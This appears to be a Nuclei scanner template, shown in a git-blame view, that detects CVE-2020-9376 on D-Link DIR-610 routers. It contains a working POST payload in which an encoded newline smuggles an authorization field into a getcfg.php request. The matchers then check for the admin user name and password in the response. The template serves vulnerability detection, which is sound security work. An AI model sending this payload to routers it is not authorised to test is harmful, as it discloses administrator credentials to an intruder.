2021-01-12 16:15:12 +00:00
|
|
|
id: CVE-2020-9376
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: D-Link Information Disclosure via getcfg.php
|
|
|
|
author: whynotke
|
|
|
|
severity: high
|
|
|
|
description: |
|
|
|
|
D-Link DIR-610 devices allow Information Disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php.
|
|
|
|
NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
|
|
|
|
|
2021-03-16 15:28:27 +00:00
|
|
|
reference:
|
|
|
|
- https://gist.github.com/GouveaHeitor/dcbb67b301cc45adc00f8a6a2a0a590f
|
|
|
|
- https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182
|
|
|
|
- https://www.dlink.com.br/produto/dir-610/
|
2021-02-05 19:44:41 +00:00
|
|
|
tags: cve,cve2020,dlink
|
2021-01-12 16:15:12 +00:00
|
|
|
requests:
|
|
|
|
- method: POST
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/getcfg.php"
|
|
|
|
|
|
|
|
body: SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1
|
|
|
|
headers:
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "<name>Admin</name>"
|
|
|
|
- "</usrid>"
|
|
|
|
- "</password>"
|
|
|
|
condition: and
|
|
|
|
part: body
|